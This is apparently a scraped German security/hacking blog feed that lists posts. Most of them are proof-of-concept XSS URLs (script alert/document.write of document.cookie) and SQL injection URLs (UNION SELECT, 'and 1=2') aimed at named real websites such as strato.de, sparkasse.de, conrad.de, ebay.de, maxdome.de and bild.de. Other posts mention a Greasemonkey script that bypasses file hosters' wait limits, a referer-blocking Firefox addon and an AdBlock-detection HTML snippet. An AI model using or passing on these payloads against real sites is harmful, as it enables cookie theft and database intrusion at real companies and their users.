http://www.strato.de/cgi-bin/bounce?<script>alert(document.cookie)</script>
http://www.strato.de/apps/DeleteNews?id="><script>alert(document.cookie)</script>

fixed

Player XSS

Einige errinern sich vielleicht noch dran, als ich den SponsorAds Layer Quellcode gepostet habe. Nun habe ich einen kleine Sammlung mit mehreren Quellcodes von Werbemitteln von SponsorAds zusammengestellt.
In der Sammlung findet Ihr folgende Quellcode:

- Picture Layer
- Spothlight Layer
- Frame Layer
- Magic Corner

Player Javascript

http://rechner.sparkasse.de/katalog/index.php?a=overview&template=72+and+1=2--+

Player SQL Injections

http://www1.conrad.de/fas6/fh.php?fh_host="><script>document.write(document.cookie)</script>

Player XSS

http://training.ebay.de/online-training/appc/content_manager/page.php?ID=9580/"><script>alert(document.cookie)</script>

Player XSS

Als ich ein Addon gesucht habe, um den Referer schnell Blockieren zu können, habe ich nur eine ganze Toolbar gefunden. Diese nimmt jedoch wieder etwas Platz weg.
Daher habe ich mich dazu entschlossen, ein eigenes Addon für den Firefox zu machen.

Es ist ein einzelner Button, den man in die Symbolleiste einfügen kann und mit einen einzelnen Klick den Referer blockieren und natürlich wieder freischalten kann.
Da vielleicht manch anderer auch so ein Addon gesucht hat, stelle ich es euch zur verfügung.



Falls Ihr noch Verbesserungsvorschläge habt oder eine andere Idee für ein Addon, könnt Ihr gerne ein Kommentar hinterlassen.

Player Firefox Addons

http://www.maxdome.de/php-bin/functions/home_flash/homeflash.swf?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+

Player SQL Injections

http://tarifvergleich.bild.de/dsl/DSL-Anbieter.asp?ID=-1union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+

Player SQL Injections

Vor einigen Tagen habe ich möglichkeiten vorgestellt, wie man bei bestimmten Hostern das Zeitlimit umgehen kann. (http://novusec.com/oneclickhoster-wait-bypass/)
Dazu habe ich jetzt ein Greasmonkey Script geschrieben, dass alles automatisch macht.
Den Downloadlink zu Greasemonkey gibt es hier:

https://addons.mozilla.org/de/firefox/addon/748

Um das Script zu Installieren, bitte auf das Greasemonkey Symbol klicken.

Player Greasemonkey

Hab mich heute wieder mal mit AdBlock beschäftigt und probiert eine detection ohne Javascript hinzubekommen.
Das Prinzip ist wieder sehr simpel.

Hier erstmal der Test

Hier der Code:

1
2

<div id="ad" style="position:absolute;"><img src="http://imgserv.sponsorads.de/endwelt/banner.php"></div>
<div><img src="http://i29.tinypic.com/70geix.jpg"></div>

Erklärung:
Es liegen 2 Div’s übereinander. Wenn Adblock an ist, wird der Div mit der id “ad” blockiert und die Div box darunter wird angezeigt. Dabei zu beachten ist, dass beide DIV Boxen mindestens gleichgroß sein sollten.

Wenn dazu noch Fragen sind, einfach ein Kommentar hinterlassen.

Player Sonstiges